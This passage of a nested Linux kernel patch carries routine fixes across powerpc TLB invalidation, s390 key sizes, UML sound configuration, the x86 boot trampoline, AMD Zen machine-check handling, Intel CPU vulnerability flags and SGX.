+-					unsigned long pid, unsigned long lpid,
+-					unsigned long page_size,
+-					unsigned long psize, bool also_pwc)
+-{
+-	asm volatile("ptesync" : : : "memory");
+-	if (also_pwc)
+-		__tlbie_pid_lpid(pid, lpid, RIC_FLUSH_PWC);
+-	__tlbie_va_range_lpid(start, end, pid, lpid, page_size, psize);
+-	asm volatile("eieio; tlbsync; ptesync" : : : "memory");
+-}
+-
+ static inline void _tlbiel_va_range_multicast(struct mm_struct *mm,
+ 				unsigned long start, unsigned long end,
+ 				unsigned long pid, unsigned long page_size,
+@@ -1476,6 +1357,127 @@ void radix__flush_tlb_all(void)
+ }
+ 
+ #ifdef CONFIG_KVM_BOOK3S_HV_POSSIBLE
++static __always_inline void __tlbie_pid_lpid(unsigned long pid,
++					     unsigned long lpid,
++					     unsigned long ric)
++{
++	unsigned long rb, rs, prs, r;
++
++	rb = PPC_BIT(53); /* IS = 1 */
++	rs = (pid << PPC_BITLSHIFT(31)) | (lpid & ~(PPC_BITMASK(0, 31)));
++	prs = 1; /* process scoped */
++	r = 1;   /* radix format */
++
++	asm volatile(PPC_TLBIE_5(%0, %4, %3, %2, %1)
++		     : : "r"(rb), "i"(r), "i"(prs), "i"(ric), "r"(rs) : "memory");
++	trace_tlbie(0, 0, rb, rs, ric, prs, r);
++}
++
++static __always_inline void __tlbie_va_lpid(unsigned long va, unsigned long pid,
++					    unsigned long lpid,
++					    unsigned long ap, unsigned long ric)
++{
++	unsigned long rb, rs, prs, r;
++
++	rb = va & ~(PPC_BITMASK(52, 63));
++	rb |= ap << PPC_BITLSHIFT(58);
++	rs = (pid << PPC_BITLSHIFT(31)) | (lpid & ~(PPC_BITMASK(0, 31)));
++	prs = 1; /* process scoped */
++	r = 1;   /* radix format */
++
++	asm volatile(PPC_TLBIE_5(%0, %4, %3, %2, %1)
++		     : : "r"(rb), "i"(r), "i"(prs), "i"(ric), "r"(rs) : "memory");
++	trace_tlbie(0, 0, rb, rs, ric, prs, r);
++}
++
++static inline void fixup_tlbie_pid_lpid(unsigned long pid, unsigned long lpid)
++{
++	/*
++	 * We can use any address for the invalidation, pick one which is
++	 * probably unused as an optimisation.
++	 */
++	unsigned long va = ((1UL << 52) - 1);
++
++	if (cpu_has_feature(CPU_FTR_P9_TLBIE_ERAT_BUG)) {
++		asm volatile("ptesync" : : : "memory");
++		__tlbie_pid_lpid(0, lpid, RIC_FLUSH_TLB);
++	}
++
++	if (cpu_has_feature(CPU_FTR_P9_TLBIE_STQ_BUG)) {
++		asm volatile("ptesync" : : : "memory");
++		__tlbie_va_lpid(va, pid, lpid, mmu_get_ap(MMU_PAGE_64K),
++				RIC_FLUSH_TLB);
++	}
++}
++
++static inline void _tlbie_pid_lpid(unsigned long pid, unsigned long lpid,
++				   unsigned long ric)
++{
++	asm volatile("ptesync" : : : "memory");
++
++	/*
++	 * Workaround the fact that the "ric" argument to __tlbie_pid
++	 * must be a compile-time contraint to match the "i" constraint
++	 * in the asm statement.
++	 */
++	switch (ric) {
++	case RIC_FLUSH_TLB:
++		__tlbie_pid_lpid(pid, lpid, RIC_FLUSH_TLB);
++		fixup_tlbie_pid_lpid(pid, lpid);
++		break;
++	case RIC_FLUSH_PWC:
++		__tlbie_pid_lpid(pid, lpid, RIC_FLUSH_PWC);
++		break;
++	case RIC_FLUSH_ALL:
++	default:
++		__tlbie_pid_lpid(pid, lpid, RIC_FLUSH_ALL);
++		fixup_tlbie_pid_lpid(pid, lpid);
++	}
++	asm volatile("eieio; tlbsync; ptesync" : : : "memory");
++}
++
++static inline void fixup_tlbie_va_range_lpid(unsigned long va,
++					     unsigned long pid,
++					     unsigned long lpid,
++					     unsigned long ap)
++{
++	if (cpu_has_feature(CPU_FTR_P9_TLBIE_ERAT_BUG)) {
++		asm volatile("ptesync" : : : "memory");
++		__tlbie_pid_lpid(0, lpid, RIC_FLUSH_TLB);
++	}
++
++	if (cpu_has_feature(CPU_FTR_P9_TLBIE_STQ_BUG)) {
++		asm volatile("ptesync" : : : "memory");
++		__tlbie_va_lpid(va, pid, lpid, ap, RIC_FLUSH_TLB);
++	}
++}
++
++static inline void __tlbie_va_range_lpid(unsigned long start, unsigned long end,
++					 unsigned long pid, unsigned long lpid,
++					 unsigned long page_size,
++					 unsigned long psize)
++{
++	unsigned long addr;
++	unsigned long ap = mmu_get_ap(psize);
++
++	for (addr = start; addr < end; addr += page_size)
++		__tlbie_va_lpid(addr, pid, lpid, ap, RIC_FLUSH_TLB);
++
++	fixup_tlbie_va_range_lpid(addr - page_size, pid, lpid, ap);
++}
++
++static inline void _tlbie_va_range_lpid(unsigned long start, unsigned long end,
++					unsigned long pid, unsigned long lpid,
++					unsigned long page_size,
++					unsigned long psize, bool also_pwc)
++{
++	asm volatile("ptesync" : : : "memory");
++	if (also_pwc)
++		__tlbie_pid_lpid(pid, lpid, RIC_FLUSH_PWC);
++	__tlbie_va_range_lpid(start, end, pid, lpid, page_size, psize);
++	asm volatile("eieio; tlbsync; ptesync" : : : "memory");
++}
++
+ /*
+  * Performs process-scoped invalidations for a given LPID
+  * as part of H_RPT_INVALIDATE hcall.
+diff --git a/arch/powerpc/mm/book3s64/slb.c b/arch/powerpc/mm/book3s64/slb.c
+index 6956f637a38c1..f2708c8629a52 100644
+--- a/arch/powerpc/mm/book3s64/slb.c
++++ b/arch/powerpc/mm/book3s64/slb.c
+@@ -13,6 +13,7 @@
+ #include <asm/mmu.h>
+ #include <asm/mmu_context.h>
+ #include <asm/paca.h>
++#include <asm/lppaca.h>
+ #include <asm/ppc-opcode.h>
+ #include <asm/cputable.h>
+ #include <asm/cacheflush.h>
+diff --git a/arch/powerpc/perf/core-fsl-emb.c b/arch/powerpc/perf/core-fsl-emb.c
+index ee721f420a7ba..1a53ab08447cb 100644
+--- a/arch/powerpc/perf/core-fsl-emb.c
++++ b/arch/powerpc/perf/core-fsl-emb.c
+@@ -645,7 +645,6 @@ static void perf_event_interrupt(struct pt_regs *regs)
+ 	struct cpu_hw_events *cpuhw = this_cpu_ptr(&cpu_hw_events);
+ 	struct perf_event *event;
+ 	unsigned long val;
+-	int found = 0;
+ 
+ 	for (i = 0; i < ppmu->n_counter; ++i) {
+ 		event = cpuhw->event[i];
+@@ -654,7 +653,6 @@ static void perf_event_interrupt(struct pt_regs *regs)
+ 		if ((int)val < 0) {
+ 			if (event) {
+ 				/* event has overflowed */
+-				found = 1;
+ 				record_and_restart(event, val, regs);
+ 			} else {
+ 				/*
+@@ -672,11 +670,13 @@ static void perf_event_interrupt(struct pt_regs *regs)
+ 	isync();
+ }
+ 
+-void hw_perf_event_setup(int cpu)
++static int fsl_emb_pmu_prepare_cpu(unsigned int cpu)
+ {
+ 	struct cpu_hw_events *cpuhw = &per_cpu(cpu_hw_events, cpu);
+ 
+ 	memset(cpuhw, 0, sizeof(*cpuhw));
++
++	return 0;
+ }
+ 
+ int register_fsl_emb_pmu(struct fsl_emb_pmu *pmu)
+@@ -689,6 +689,8 @@ int register_fsl_emb_pmu(struct fsl_emb_pmu *pmu)
+ 		pmu->name);
+ 
+ 	perf_pmu_register(&fsl_emb_pmu, "cpu", PERF_TYPE_RAW);
++	cpuhp_setup_state(CPUHP_PERF_POWER, "perf/powerpc:prepare",
++			  fsl_emb_pmu_prepare_cpu, NULL);
+ 
+ 	return 0;
+ }
+diff --git a/arch/powerpc/platforms/powermac/time.c b/arch/powerpc/platforms/powermac/time.c
+index 4c5790aff1b54..8633891b7aa58 100644
+--- a/arch/powerpc/platforms/powermac/time.c
++++ b/arch/powerpc/platforms/powermac/time.c
+@@ -26,8 +26,8 @@
+ #include <linux/rtc.h>
+ #include <linux/of_address.h>
+ 
++#include <asm/early_ioremap.h>
+ #include <asm/sections.h>
+-#include <asm/io.h>
+ #include <asm/machdep.h>
+ #include <asm/time.h>
+ #include <asm/nvram.h>
+@@ -182,7 +182,7 @@ static int __init via_calibrate_decr(void)
+ 		return 0;
+ 	}
+ 	of_node_put(vias);
+-	via = ioremap(rsrc.start, resource_size(&rsrc));
++	via = early_ioremap(rsrc.start, resource_size(&rsrc));
+ 	if (via == NULL) {
+ 		printk(KERN_ERR "Failed to map VIA for timer calibration !\n");
+ 		return 0;
+@@ -207,7 +207,7 @@ static int __init via_calibrate_decr(void)
+ 
+ 	ppc_tb_freq = (dstart - dend) * 100 / 6;
+ 
+-	iounmap(via);
++	early_iounmap((void *)via, resource_size(&rsrc));
+ 
+ 	return 1;
+ }
+diff --git a/arch/powerpc/platforms/pseries/hvCall.S b/arch/powerpc/platforms/pseries/hvCall.S
+index 762eb15d3bd42..fc50b9c27c1ba 100644
+--- a/arch/powerpc/platforms/pseries/hvCall.S
++++ b/arch/powerpc/platforms/pseries/hvCall.S
+@@ -89,6 +89,7 @@ BEGIN_FTR_SECTION;						\
+ 	b	1f;						\
+ END_FTR_SECTION(0, 1);						\
+ 	LOAD_REG_ADDR(r12, hcall_tracepoint_refcount) ;		\
++	ld	r12,0(r12);					\
+ 	std	r12,32(r1);					\
+ 	cmpdi	r12,0;						\
+ 	bne-	LABEL;						\
+diff --git a/arch/powerpc/platforms/pseries/lpar.c b/arch/powerpc/platforms/pseries/lpar.c
+index 97ef6499e5019..2c2812a87d470 100644
+--- a/arch/powerpc/platforms/pseries/lpar.c
++++ b/arch/powerpc/platforms/pseries/lpar.c
+@@ -638,16 +638,8 @@ static const struct proc_ops vcpudispatch_stats_freq_proc_ops = {
+ 
+ static int __init vcpudispatch_stats_procfs_init(void)
+ {
+-	/*
+-	 * Avoid smp_processor_id while preemptible. All CPUs should have
+-	 * the same value for lppaca_shared_proc.
+-	 */
+-	preempt_disable();
+-	if (!lppaca_shared_proc(get_lppaca())) {
+-		preempt_enable();
++	if (!lppaca_shared_proc())
+ 		return 0;
+-	}
+-	preempt_enable();
+ 
+ 	if (!proc_create("powerpc/vcpudispatch_stats", 0600, NULL,
+ 					&vcpudispatch_stats_proc_ops))
+diff --git a/arch/powerpc/platforms/pseries/lparcfg.c b/arch/powerpc/platforms/pseries/lparcfg.c
+index 63fd925ccbb83..ca10a3682c46e 100644
+--- a/arch/powerpc/platforms/pseries/lparcfg.c
++++ b/arch/powerpc/platforms/pseries/lparcfg.c
+@@ -205,7 +205,7 @@ static void parse_ppp_data(struct seq_file *m)
+ 	           ppp_data.active_system_procs);
+ 
+ 	/* pool related entries are appropriate for shared configs */
+-	if (lppaca_shared_proc(get_lppaca())) {
++	if (lppaca_shared_proc()) {
+ 		unsigned long pool_idle_time, pool_procs;
+ 
+ 		seq_printf(m, "pool=%d\n", ppp_data.pool_num);
+@@ -616,7 +616,7 @@ static int pseries_lparcfg_data(struct seq_file *m, void *v)
+ 		   partition_potential_processors);
+ 
+ 	seq_printf(m, "shared_processor_mode=%d\n",
+-		   lppaca_shared_proc(get_lppaca()));
++		   lppaca_shared_proc());
+ 
+ #ifdef CONFIG_PPC_64S_HASH_MMU
+ 	if (!radix_enabled())
+diff --git a/arch/powerpc/platforms/pseries/setup.c b/arch/powerpc/platforms/pseries/setup.c
+index 8ef3270515a9b..a0701dbdb1348 100644
+--- a/arch/powerpc/platforms/pseries/setup.c
++++ b/arch/powerpc/platforms/pseries/setup.c
+@@ -846,7 +846,7 @@ static void __init pSeries_setup_arch(void)
+ 	if (firmware_has_feature(FW_FEATURE_LPAR)) {
+ 		vpa_init(boot_cpuid);
+ 
+-		if (lppaca_shared_proc(get_lppaca())) {
++		if (lppaca_shared_proc()) {
+ 			static_branch_enable(&shared_processor);
+ 			pv_spinlocks_init();
+ #ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
+diff --git a/arch/powerpc/sysdev/mpc5xxx_clocks.c b/arch/powerpc/sysdev/mpc5xxx_clocks.c
+index c5bf7e1b37804..58cee28e23992 100644
+--- a/arch/powerpc/sysdev/mpc5xxx_clocks.c
++++ b/arch/powerpc/sysdev/mpc5xxx_clocks.c
+@@ -25,8 +25,10 @@ unsigned long mpc5xxx_fwnode_get_bus_frequency(struct fwnode_handle *fwnode)
+ 
+ 	fwnode_for_each_parent_node(fwnode, parent) {
+ 		ret = fwnode_property_read_u32(parent, "bus-frequency", &bus_freq);
+-		if (!ret)
++		if (!ret) {
++			fwnode_handle_put(parent);
+ 			return bus_freq;
++		}
+ 	}
+ 
+ 	return 0;
+diff --git a/arch/powerpc/xmon/xmon.c b/arch/powerpc/xmon/xmon.c
+index bd8e80936f44d..cd692f399cd18 100644
+--- a/arch/powerpc/xmon/xmon.c
++++ b/arch/powerpc/xmon/xmon.c
+@@ -58,6 +58,7 @@
+ #ifdef CONFIG_PPC64
+ #include <asm/hvcall.h>
+ #include <asm/paca.h>
++#include <asm/lppaca.h>
+ #endif
+ 
+ #include "nonstdio.h"
+diff --git a/arch/s390/crypto/paes_s390.c b/arch/s390/crypto/paes_s390.c
+index a279b7d23a5e2..621322eb0e681 100644
+--- a/arch/s390/crypto/paes_s390.c
++++ b/arch/s390/crypto/paes_s390.c
+@@ -35,7 +35,7 @@
+  * and padding is also possible, the limits need to be generous.
+  */
+ #define PAES_MIN_KEYSIZE 16
+-#define PAES_MAX_KEYSIZE 320
++#define PAES_MAX_KEYSIZE MAXEP11AESKEYBLOBSIZE
+ 
+ static u8 *ctrblk;
+ static DEFINE_MUTEX(ctrblk_lock);
+diff --git a/arch/s390/include/uapi/asm/pkey.h b/arch/s390/include/uapi/asm/pkey.h
+index 924b876f992c1..29c6fd369761e 100644
+--- a/arch/s390/include/uapi/asm/pkey.h
++++ b/arch/s390/include/uapi/asm/pkey.h
+@@ -26,7 +26,7 @@
+ #define MAXCLRKEYSIZE	32	   /* a clear key value may be up to 32 bytes */
+ #define MAXAESCIPHERKEYSIZE 136  /* our aes cipher keys have always 136 bytes */
+ #define MINEP11AESKEYBLOBSIZE 256  /* min EP11 AES key blob size  */
+-#define MAXEP11AESKEYBLOBSIZE 320  /* max EP11 AES key blob size */
++#define MAXEP11AESKEYBLOBSIZE 336  /* max EP11 AES key blob size */
+ 
+ /* Minimum size of a key blob */
+ #define MINKEYBLOBSIZE	SECKEYBLOBSIZE
+diff --git a/arch/s390/kernel/ipl.c b/arch/s390/kernel/ipl.c
+index 325cbf69ebbde..df5d2ec737d80 100644
+--- a/arch/s390/kernel/ipl.c
++++ b/arch/s390/kernel/ipl.c
+@@ -503,6 +503,8 @@ static struct attribute_group ipl_ccw_attr_group_lpar = {
+ 
+ static struct attribute *ipl_unknown_attrs[] = {
+ 	&sys_ipl_type_attr.attr,
++	&sys_ipl_secure_attr.attr,
++	&sys_ipl_has_secure_attr.attr,
+ 	NULL,
+ };
+ 
+diff --git a/arch/um/configs/i386_defconfig b/arch/um/configs/i386_defconfig
+index c0162286d68b7..c33a6880a437a 100644
+--- a/arch/um/configs/i386_defconfig
++++ b/arch/um/configs/i386_defconfig
+@@ -35,6 +35,7 @@ CONFIG_TTY_CHAN=y
+ CONFIG_XTERM_CHAN=y
+ CONFIG_CON_CHAN="pts"
+ CONFIG_SSL_CHAN="pts"
++CONFIG_SOUND=m
+ CONFIG_UML_SOUND=m
+ CONFIG_DEVTMPFS=y
+ CONFIG_DEVTMPFS_MOUNT=y
+diff --git a/arch/um/configs/x86_64_defconfig b/arch/um/configs/x86_64_defconfig
+index bec6e5d956873..df29f282b6ac2 100644
+--- a/arch/um/configs/x86_64_defconfig
++++ b/arch/um/configs/x86_64_defconfig
+@@ -33,6 +33,7 @@ CONFIG_TTY_CHAN=y
+ CONFIG_XTERM_CHAN=y
+ CONFIG_CON_CHAN="pts"
+ CONFIG_SSL_CHAN="pts"
++CONFIG_SOUND=m
+ CONFIG_UML_SOUND=m
+ CONFIG_DEVTMPFS=y
+ CONFIG_DEVTMPFS_MOUNT=y
+diff --git a/arch/um/drivers/Kconfig b/arch/um/drivers/Kconfig
+index 5903e2b598aae..fe0210eaf9bb6 100644
+--- a/arch/um/drivers/Kconfig
++++ b/arch/um/drivers/Kconfig
+@@ -111,24 +111,14 @@ config SSL_CHAN
+ 
+ config UML_SOUND
+ 	tristate "Sound support"
++	depends on SOUND
++	select SOUND_OSS_CORE
+ 	help
+ 	  This option enables UML sound support.  If enabled, it will pull in
+-	  soundcore and the UML hostaudio relay, which acts as a intermediary
++	  the UML hostaudio relay, which acts as a intermediary
+ 	  between the host's dsp and mixer devices and the UML sound system.
+ 	  It is safe to say 'Y' here.
+ 
+-config SOUND
+-	tristate
+-	default UML_SOUND
+-
+-config SOUND_OSS_CORE
+-	bool
+-	default UML_SOUND
+-
+-config HOSTAUDIO
+-	tristate
+-	default UML_SOUND
+-
+ endmenu
+ 
+ menu "UML Network Devices"
+diff --git a/arch/um/drivers/Makefile b/arch/um/drivers/Makefile
+index 65b449c992d2c..079556ec044b8 100644
+--- a/arch/um/drivers/Makefile
++++ b/arch/um/drivers/Makefile
+@@ -54,7 +54,7 @@ obj-$(CONFIG_UML_NET) += net.o
+ obj-$(CONFIG_MCONSOLE) += mconsole.o
+ obj-$(CONFIG_MMAPPER) += mmapper_kern.o 
+ obj-$(CONFIG_BLK_DEV_UBD) += ubd.o 
+-obj-$(CONFIG_HOSTAUDIO) += hostaudio.o
++obj-$(CONFIG_UML_SOUND) += hostaudio.o
+ obj-$(CONFIG_NULL_CHAN) += null.o 
+ obj-$(CONFIG_PORT_CHAN) += port.o
+ obj-$(CONFIG_PTY_CHAN) += pty.o
+diff --git a/arch/x86/boot/compressed/head_64.S b/arch/x86/boot/compressed/head_64.S
+index d33f060900d23..b4bd6df29116f 100644
+--- a/arch/x86/boot/compressed/head_64.S
++++ b/arch/x86/boot/compressed/head_64.S
+@@ -485,11 +485,25 @@ SYM_CODE_START(startup_64)
+ 	/* Save the trampoline address in RCX */
+ 	movq	%rax, %rcx
+ 
++	/* Set up 32-bit addressable stack */
++	leaq	TRAMPOLINE_32BIT_STACK_END(%rcx), %rsp
++
++	/*
++	 * Preserve live 64-bit registers on the stack: this is necessary
++	 * because the architecture does not guarantee that GPRs will retain
++	 * their full 64-bit values across a 32-bit mode switch.
++	 */
++	pushq	%rbp
++	pushq	%rbx
++	pushq	%rsi
++
+ 	/*
+-	 * Load the address of trampoline_return() into RDI.
+-	 * It will be used by the trampoline to return to the main code.
++	 * Push the 64-bit address of trampoline_return() onto the new stack.
++	 * It will be used by the trampoline to return to the main code. Due to
++	 * the 32-bit mode switch, it cannot be kept it in a register either.
+ 	 */
+ 	leaq	trampoline_return(%rip), %rdi
++	pushq	%rdi
+ 
+ 	/* Switch to compatibility mode (CS.L = 0 CS.D = 1) via far return */
+ 	pushq	$__KERNEL32_CS
+@@ -497,6 +511,11 @@ SYM_CODE_START(startup_64)
+ 	pushq	%rax
+ 	lretq
+ trampoline_return:
++	/* Restore live 64-bit registers */
++	popq	%rsi
++	popq	%rbx
++	popq	%rbp
++
+ 	/* Restore the stack, the 32-bit trampoline uses its own stack */
+ 	leaq	rva(boot_stack_end)(%rbx), %rsp
+ 
+@@ -606,7 +625,7 @@ SYM_FUNC_END(.Lrelocated)
+ /*
+  * This is the 32-bit trampoline that will be copied over to low memory.
+  *
+- * RDI contains the return address (might be above 4G).
++ * Return address is at the top of the stack (might be above 4G).
+  * ECX contains the base address of the trampoline memory.
+  * Non zero RDX means trampoline needs to enable 5-level paging.
+  */
+@@ -616,9 +635,6 @@ SYM_CODE_START(trampoline_32bit_src)
+ 	movl	%eax, %ds
+ 	movl	%eax, %ss
+ 
+-	/* Set up new stack */
+-	leal	TRAMPOLINE_32BIT_STACK_END(%ecx), %esp
+-
+ 	/* Disable paging */
+ 	movl	%cr0, %eax
+ 	btrl	$X86_CR0_PG_BIT, %eax
+@@ -695,7 +711,7 @@ SYM_CODE_END(trampoline_32bit_src)
+ 	.code64
+ SYM_FUNC_START_LOCAL_NOALIGN(.Lpaging_enabled)
+ 	/* Return from the trampoline */
+-	jmp	*%rdi
++	retq
+ SYM_FUNC_END(.Lpaging_enabled)
+ 
+ 	/*
+diff --git a/arch/x86/events/intel/uncore_snbep.c b/arch/x86/events/intel/uncore_snbep.c
+index 935081ddf60bc..9b5859812f4fb 100644
+--- a/arch/x86/events/intel/uncore_snbep.c
++++ b/arch/x86/events/intel/uncore_snbep.c
+@@ -6078,8 +6078,18 @@ void spr_uncore_cpu_init(void)
+ 
+ 	type = uncore_find_type_by_id(uncore_msr_uncores, UNCORE_SPR_CHA);
+ 	if (type) {
++		/*
++		 * The value from the discovery table (stored in the type->num_boxes
++		 * of UNCORE_SPR_CHA) is incorrect on some SPR variants because of a
++		 * firmware bug. Using the value from SPR_MSR_UNC_CBO_CONFIG to replace it.
++		 */
+ 		rdmsrl(SPR_MSR_UNC_CBO_CONFIG, num_cbo);
+-		type->num_boxes = num_cbo;
++		/*
++		 * The MSR doesn't work on the EMR XCC, but the firmware bug doesn't impact
++		 * the EMR XCC. Don't let the value from the MSR replace the existing value.
++		 */
++		if (num_cbo)
++			type->num_boxes = num_cbo;
+ 	}
+ 	spr_uncore_iio_free_running.num_boxes = uncore_type_max_boxes(uncore_msr_uncores, UNCORE_SPR_IIO);
+ }
+diff --git a/arch/x86/include/asm/mem_encrypt.h b/arch/x86/include/asm/mem_encrypt.h
+index 8f513372cd8d4..c91326593e741 100644
+--- a/arch/x86/include/asm/mem_encrypt.h
++++ b/arch/x86/include/asm/mem_encrypt.h
+@@ -50,8 +50,8 @@ void __init sme_enable(struct boot_params *bp);
+ 
+ int __init early_set_memory_decrypted(unsigned long vaddr, unsigned long size);
+ int __init early_set_memory_encrypted(unsigned long vaddr, unsigned long size);
+-void __init early_set_mem_enc_dec_hypercall(unsigned long vaddr, int npages,
+-					    bool enc);
++void __init early_set_mem_enc_dec_hypercall(unsigned long vaddr,
++					    unsigned long size, bool enc);
+ 
+ void __init mem_encrypt_free_decrypted_mem(void);
+ 
+@@ -84,7 +84,7 @@ early_set_memory_decrypted(unsigned long vaddr, unsigned long size) { return 0;
+ static inline int __init
+ early_set_memory_encrypted(unsigned long vaddr, unsigned long size) { return 0; }
+ static inline void __init
+-early_set_mem_enc_dec_hypercall(unsigned long vaddr, int npages, bool enc) {}
++early_set_mem_enc_dec_hypercall(unsigned long vaddr, unsigned long size, bool enc) {}
+ 
+ static inline void mem_encrypt_free_decrypted_mem(void) { }
+ 
+diff --git a/arch/x86/include/asm/pgtable_types.h b/arch/x86/include/asm/pgtable_types.h
+index aa174fed3a71c..f6116b66f2892 100644
+--- a/arch/x86/include/asm/pgtable_types.h
++++ b/arch/x86/include/asm/pgtable_types.h
+@@ -125,11 +125,12 @@
+  * instance, and is *not* included in this mask since
+  * pte_modify() does modify it.
+  */
+-#define _PAGE_CHG_MASK	(PTE_PFN_MASK | _PAGE_PCD | _PAGE_PWT |		\
+-			 _PAGE_SPECIAL | _PAGE_ACCESSED | _PAGE_DIRTY |	\
+-			 _PAGE_SOFT_DIRTY | _PAGE_DEVMAP | _PAGE_ENC |  \
+-			 _PAGE_UFFD_WP)
+-#define _HPAGE_CHG_MASK (_PAGE_CHG_MASK | _PAGE_PSE)
++#define _COMMON_PAGE_CHG_MASK	(PTE_PFN_MASK | _PAGE_PCD | _PAGE_PWT |	       \
++				 _PAGE_SPECIAL | _PAGE_ACCESSED | _PAGE_DIRTY |\
++				 _PAGE_SOFT_DIRTY | _PAGE_DEVMAP | _PAGE_ENC | \
++				 _PAGE_UFFD_WP)
++#define _PAGE_CHG_MASK	(_COMMON_PAGE_CHG_MASK | _PAGE_PAT)
++#define _HPAGE_CHG_MASK (_COMMON_PAGE_CHG_MASK | _PAGE_PSE | _PAGE_PAT_LARGE)
+ 
+ /*
+  * The cache modes defined here are used to translate between pure SW usage
+diff --git a/arch/x86/kernel/apm_32.c b/arch/x86/kernel/apm_32.c
+index 60e330cdbd175..6e38188633a4d 100644
+--- a/arch/x86/kernel/apm_32.c
++++ b/arch/x86/kernel/apm_32.c
+@@ -238,12 +238,6 @@
+ extern int (*console_blank_hook)(int);
+ #endif
+ 
+-/*
+- * The apm_bios device is one of the misc char devices.
+- * This is its minor number.
+- */
+-#define	APM_MINOR_DEV	134
+-
+ /*
+  * Various options can be changed at boot time as follows:
+  * (We allow underscores for compatibility with the modules code)
+diff --git a/arch/x86/kernel/cpu/common.c b/arch/x86/kernel/cpu/common.c
+index d38ae25e7c01f..b723368dbc644 100644
+--- a/arch/x86/kernel/cpu/common.c
++++ b/arch/x86/kernel/cpu/common.c
+@@ -1259,11 +1259,11 @@ static const struct x86_cpu_id cpu_vuln_blacklist[] __initconst = {
+ 	VULNBL_INTEL_STEPPINGS(BROADWELL_G,	X86_STEPPING_ANY,		SRBDS),
+ 	VULNBL_INTEL_STEPPINGS(BROADWELL_X,	X86_STEPPING_ANY,		MMIO),
+ 	VULNBL_INTEL_STEPPINGS(BROADWELL,	X86_STEPPING_ANY,		SRBDS),
+-	VULNBL_INTEL_STEPPINGS(SKYLAKE_L,	X86_STEPPING_ANY,		SRBDS | MMIO | RETBLEED),
+ 	VULNBL_INTEL_STEPPINGS(SKYLAKE_X,	X86_STEPPING_ANY,		MMIO | RETBLEED | GDS),
+-	VULNBL_INTEL_STEPPINGS(SKYLAKE,		X86_STEPPING_ANY,		SRBDS | MMIO | RETBLEED),
+-	VULNBL_INTEL_STEPPINGS(KABYLAKE_L,	X86_STEPPING_ANY,		SRBDS | MMIO | RETBLEED | GDS),
+-	VULNBL_INTEL_STEPPINGS(KABYLAKE,	X86_STEPPING_ANY,		SRBDS | MMIO | RETBLEED | GDS),
++	VULNBL_INTEL_STEPPINGS(SKYLAKE_L,	X86_STEPPING_ANY,		MMIO | RETBLEED | GDS | SRBDS),
++	VULNBL_INTEL_STEPPINGS(SKYLAKE,		X86_STEPPING_ANY,		MMIO | RETBLEED | GDS | SRBDS),
++	VULNBL_INTEL_STEPPINGS(KABYLAKE_L,	X86_STEPPING_ANY,		MMIO | RETBLEED | GDS | SRBDS),
++	VULNBL_INTEL_STEPPINGS(KABYLAKE,	X86_STEPPING_ANY,		MMIO | RETBLEED | GDS | SRBDS),
+ 	VULNBL_INTEL_STEPPINGS(CANNONLAKE_L,	X86_STEPPING_ANY,		RETBLEED),
+ 	VULNBL_INTEL_STEPPINGS(ICELAKE_L,	X86_STEPPING_ANY,		MMIO | MMIO_SBDS | RETBLEED | GDS),
+ 	VULNBL_INTEL_STEPPINGS(ICELAKE_D,	X86_STEPPING_ANY,		MMIO | GDS),
+diff --git a/arch/x86/kernel/cpu/mce/core.c b/arch/x86/kernel/cpu/mce/core.c
+index e228d58ee2645..f1a748da5fabb 100644
+--- a/arch/x86/kernel/cpu/mce/core.c
++++ b/arch/x86/kernel/cpu/mce/core.c
+@@ -856,6 +856,26 @@ static noinstr bool quirk_skylake_repmov(void)
+ 	return false;
+ }
+ 
++/*
++ * Some Zen-based Instruction Fetch Units set EIPV=RIPV=0 on poison consumption
++ * errors. This means mce_gather_info() will not save the "ip" and "cs" registers.
++ *
++ * However, the context is still valid, so save the "cs" register for later use.
++ *
++ * The "ip" register is truly unknown, so don't save it or fixup EIPV/RIPV.
++ *
++ * The Instruction Fetch Unit is at MCA bank 1 for all affected systems.
++ */
++static __always_inline void quirk_zen_ifu(int bank, struct mce *m, struct pt_regs *regs)
++{
++	if (bank != 1)
++		return;
++	if (!(m->status & MCI_STATUS_POISON))
++		return;
++
++	m->cs = regs->cs;
++}
++
+ /*
+  * Do a quick check if any of the events requires a panic.
+  * This decides if we keep the events around or clear them.
+@@ -875,6 +895,9 @@ static __always_inline int mce_no_way_out(struct mce *m, char **msg, unsigned lo
+ 		if (mce_flags.snb_ifu_quirk)
+ 			quirk_sandybridge_ifu(i, m, regs);
+ 
++		if (mce_flags.zen_ifu_quirk)
++			quirk_zen_ifu(i, m, regs);
++
+ 		m->bank = i;
+ 		if (mce_severity(m, regs, &tmp, true) >= MCE_PANIC_SEVERITY) {
+ 			mce_read_aux(m, i);
+@@ -1852,6 +1875,9 @@ static int __mcheck_cpu_apply_quirks(struct cpuinfo_x86 *c)
+ 		if (c->x86 == 0x15 && c->x86_model <= 0xf)
+ 			mce_flags.overflow_recov = 1;
+ 
++		if (c->x86 >= 0x17 && c->x86 <= 0x1A)
++			mce_flags.zen_ifu_quirk = 1;
++
+ 	}
+ 
+ 	if (c->x86_vendor == X86_VENDOR_INTEL) {
+diff --git a/arch/x86/kernel/cpu/mce/internal.h b/arch/x86/kernel/cpu/mce/internal.h
+index 7e03f5b7f6bd7..0bed57ac86c51 100644
+--- a/arch/x86/kernel/cpu/mce/internal.h
++++ b/arch/x86/kernel/cpu/mce/internal.h
+@@ -157,6 +157,9 @@ struct mce_vendor_flags {
+ 	 */
+ 	smca			: 1,
+ 
++	/* Zen IFU quirk */
++	zen_ifu_quirk		: 1,
++
+ 	/* AMD-style error thresholding banks present. */
+ 	amd_threshold		: 1,
+ 
+@@ -172,7 +175,7 @@ struct mce_vendor_flags {
+ 	/* Skylake, Cascade Lake, Cooper Lake REP;MOVS* quirk */
+ 	skx_repmov_quirk	: 1,
+ 
+-	__reserved_0		: 56;
++	__reserved_0		: 55;
+ };
+ 
+ extern struct mce_vendor_flags mce_flags;
+diff --git a/arch/x86/kernel/cpu/sgx/virt.c b/arch/x86/kernel/cpu/sgx/virt.c
+index 6a77a14eee38c..f5549704ac4cb 100644
+--- a/arch/x86/kernel/cpu/sgx/virt.c
++++ b/arch/x86/kernel/cpu/sgx/virt.c
+@@ -204,6 +204,7 @@ static int sgx_vepc_release(struct inode *inode, struct file *file)
+ 			continue;
+ 
+ 		xa_erase(&vepc->page_array, index);
++		cond_resched();
+ 	}
+ 
+ 	/*
+@@ -222,6 +223,7 @@ static int sgx_vepc_release(struct inode *inode, struct file *file)
+ 			list_add_tail(&epc_page->list, &secs_pages);
+ 
+ 		xa_erase(&vepc->page_array, index);
++		cond_resched();
+ 	}
